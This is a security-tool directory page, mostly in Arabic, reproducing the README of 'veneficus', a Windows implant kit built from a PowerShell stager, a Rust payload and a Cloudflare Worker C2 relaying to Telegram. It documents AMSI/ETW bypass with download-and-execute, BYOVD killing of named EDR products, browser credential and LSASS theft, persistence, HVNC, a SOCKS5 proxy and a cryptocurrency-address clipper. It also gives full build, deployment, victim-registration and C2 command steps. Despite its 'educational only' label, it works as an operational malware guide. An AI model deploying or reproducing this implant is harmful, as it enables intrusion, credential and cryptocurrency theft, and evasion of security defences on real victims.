Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
veneficus — إمبلانت من الفئة النخبوية فائقة التطور من البداية إلى النهاية 0day. سلسلة قتل كاملة. استغلال، تصعيد، محورية، تسميم، استمرارية. | Kitploit
أدوات/GitHubGitHub/abraxas/veneficus
تصعيد الامتيازاتآليات الاستمراريةالتهرب من IDS/IPSالحركة الجانبيةتسريب البياناتما بعد الاستغلالتحليل البرمجيات الخبيثةالقيادة والسيطرةالفريق الأحمرتطوير الحمولاتحصان طروادة للوصول عن بعد
218منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
abraxas/veneficus

veneficus

إمبلانت من الفئة النخبوية فائقة التطور من البداية إلى النهاية 0day. سلسلة قتل كاملة. استغلال، تصعيد، محورية، تسميم، استمرارية.

عرض المستودع

ABRAXAS LABS — analyze · reverse · disclose

@abraxas_null · [email protected] · abraxaslabs.tech · github.com/abraxas/veneficus
Credit: @YoSoth0

Veneficus Mini v3.0

مجموعة أدوات زرع (implant) لنظام Windows 10/11 x64: PowerShell stager، وRust PE، وCloudflare Worker يقوم بإشعار المشغّل عبر Telegram.

الـ stager (resources/loader.ps1) مُصمَّم لإسكات AMSI في عملية PowerShell الحالية، وسحب الـ implant من مسار /beacon الخاص بالـ Worker، ثم تشغيله باسم %TEMP%\MicrosoftEdgeUpdate.exe. بعد ذلك يقوم الـ PE بتقييم المضيف بحثًا عن آثار بيئات الحماية/المحلّلين. الدرجة العالية تمحو الملف التنفيذي؛ والدرجة المتوسطة تدخل في "الوضع الآمن" (بصمة فقط)؛ والدرجة المنخفضة تشغّل الحزمة الكاملة — تصحيحات AMSI/ETW، وBYOVD pool ضد عمليات EDR المُسمّاة، وسرقة بيانات اعتماد المتصفح، وسلسلة استخراج LSASS، واستمرارية عبر WMI/المهام المجدولة/Run، ووكيل SOCKS5 محلي، ومستمع HVNC/RFB محلي، وقاطع محتوى (clipper) لعناوين العملات الرقمية. حلقة HTTPS مُتشوّشة (jittered) تُرسل beacon وتستعلم عن مجموعة أوامر صغيرة (/status، /proxy_on، /self_destruct، /re_infect، /sleep، ومفاتيح تبديل الوضع الآمن). يتم التسريب (Exfil) باستخدام AES-256-GCM مع HMAC، بمفتاح مشتق من UUID مُضمَّن وقت الترجمة؛ ومن المفترض أن يقوم الـ Worker بتمرير النص المشفّر دون الاحتفاظ بالمفتاح.

هذا المستودع منشور لأغراض التعليم والتحليل. قراءة ملفًا بملف لما هو مُنفَّذ مقابل ما هو مُعلَّق (stubbed) متوفرة في VENEFICUS_MINI_v3_DEEP_ANALYSIS.md.

لأغراض تعليمية فقط. 2026 جميع الحقوق معكوسة.


البنية المعمارية

VICTIM MACHINE
  loader.ps1 (AMSI/ETW bypass → download → execute)
    └── veneficus_mini.exe
          ├── Environment assessment (sandbox/VM/analyst detection)
          ├── Stealth: syscall bypass chain, lacuna stack-spoof, DKOM, AMSI/ETW patch
          ├── BYOVD: kill EDR processes (K7RKScan, ThrottleStop, BdApi, TrueSight, wsftprm, RTCore64)
          ├── Payload: creds, cookies, LSASS dump, device fingerprint
          ├── Persistence: WMI / Scheduled Task / Registry (three-way fallback)
          ├── SOCKS5 proxy (127.0.0.1:1080 by default, configurable)
          ├── HVNC (127.0.0.1:5900 by default, configurable)
          ├── Clipper: crypto address hijacking (BTC, ETH, LTC, XMR, DOGE, SOL, XRP, BNB, USDT)
          └── C2 loop: AES-GCM encrypted poll every 10 ± 3s (safe mode: 60 ± 18s)
                ↕ HTTPS
CLOUDFLARE WORKER
  /beacon   → implant download
  /exfil    → receive encrypted data → forward ciphertext to Telegram
  /commands → return queued commands (one-time queue)
  /config   → return operator config blob
  /admin    → queue commands  (requires X-Admin-Key)
  /register → register UUID   (requires X-Admin-Key)
  /unregister → revoke UUID   (requires X-Admin-Key)
  /listing  → list all UUIDs (requires X-Admin-Key)
  /set_config → push config  (requires X-Admin-Key)
                ↓
TELEGRAM BOT
  Receives: ciphertext + nonce + HMAC (operator decrypts offline)

المتطلبات الأساسية

المكوّنطريقة التثبيت
Rust + cargocurl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
هدف الترجمة المتقاطعة لنظام Windowsrustup target add x86_64-pc-windows-gnu
رابط MinGW المتقاطعsudo apt install mingw-w64
Wrangler (واجهة سطر أوامر CF Worker)npm install -g wrangler

الإعداد

1. Cloudflare Worker

wrangler login
wrangler init veneficus-relay
# Replace worker.js with cloudflare/worker.js

wrangler secret put TELEGRAM_TOKEN     # from @BotFather
wrangler secret put TELEGRAM_CHAT_ID   # your chat/group ID
wrangler secret put ADMIN_KEY          # random 32-char secret

wrangler kv:namespace create "UUID_KV"
wrangler kv:namespace create "COMMANDS_KV"
wrangler kv:namespace create "CONFIG_KV"

# Add KV bindings to wrangler.toml:
#   [[kv_namespaces]]
#   binding = "UUID_KV"
#   id = "<uuid_kv_id>"
#   (repeat for COMMANDS_KV, CONFIG_KV)

wrangler deploy

2. توليد Relay URL

import base64
url = b"https://your-worker.workers.dev"
key = 0xAF
enc = bytes([b ^ key for b in url])
print(base64.b64encode(enc).decode())   # → set as RELAY_URL_BYTES

3. البناء

RELAY_URL_BYTES="<output_above>" \
BYOVD_DRIVER_DIR="./drivers" \
TOOLS_DIR="./tools" \
cargo build --release --target x86_64-pc-windows-gnu

ضع ملفات التعريف .sys القابلة للاستغلال في drivers/ والملفات التنفيذية للأدوات في tools/ قبل البناء.

4. تسجيل UUID الخاص بالـ implant

اقرأ UUID من الملف التنفيذي (مُضمَّن وقت البناء):

strings target/x86_64-pc-windows-gnu/release/veneficus_mini.exe | grep -E "[0-9a-f]{8}-[0-9a-f]{4}"

سجّل عبر واجهة admin API:

curl -X POST https://your-worker.workers.dev/register \
  -H "X-Admin-Key: YOUR_ADMIN_KEY" \
  -H "Content-Type: application/json" \
  -d '{"implant_uuid":"<uuid>","note":"op_blackbird_host01"}'

5. دفع إعدادات المشغّل (عناوين الـ clipper، إلخ)

curl -X POST https://your-worker.workers.dev/set_config \
  -H "X-Admin-Key: YOUR_ADMIN_KEY" \
  -H "Content-Type: application/json" \
  -d '{
    "implant_uuid": "global",
    "config": {
      "clipper_addresses": {
        "bitcoin":  "bc1qyourwallethere",
        "ethereum": "0xYOURWALLETHERE"
      },
      "reinfect_url": "https://your-worker.workers.dev/beacon"
    }
  }'

أوامر C2

أرسلها عبر نقطة النهاية /admin:

curl -X POST https://your-worker.workers.dev/admin \
  -H "X-Admin-Key: YOUR_ADMIN_KEY" \
  -H "Content-Type: application/json" \
  -d '{"implant_uuid":"<uuid>","command":"/status"}'
الأمرالتأثير
/self_destructمحو بثلاث مرات + مسح سجل الأحداث + الخروج
/re_infectتنزيل حمولة جديدة من reinfect_url في الإعدادات، واستبدال نفسه
/statusإرسال PID، وحالة الوكيل، والوضع الآمن، وUUID إلى C2
/proxy_onتفعيل وكيل SOCKS5
/proxy_offتعطيل وكيل SOCKS5
/exit_safeالخروج من الوضع الآمن، واستئناف التشغيل الكامل
/enter_safeالدخول في الوضع الآمن (بصمة فقط)
/sleep <secs>تجاوز الفاصل الأساسي لاستعلام C2

سلاسل الاحتياط (Fallback Chains)

الوحدةالسلسلة (الأيسر = يُجرَّب أولًا)
BYOVDK7RKScan → BdApiUtil64 → TrueSight → ThrottleStop → STProcessMonitor → wsftprm → RTCore64 → capcom → disable blocklist
LSASSMiniDumpWriteDump (native) → WDigest patch → LSA Whisperer → DumpGuard → PPL bypass (RTCore64)
NTLMPrinterBug → PetitPotam → cross-protocol relay (HTTP→LDAP) → CVE-2025-33073 → MSSQL relay
SyscallsTartarus Gate → Halo's Gate → ntdll unhook → indirect → standard WinAPI
DKOMEPROCESS unlink → PspChained enumeration → EDR callback unregister
PersistenceWMI subscription → Scheduled Task → HKLM Run key

تخطيط المجلدات

تنزيل الأداة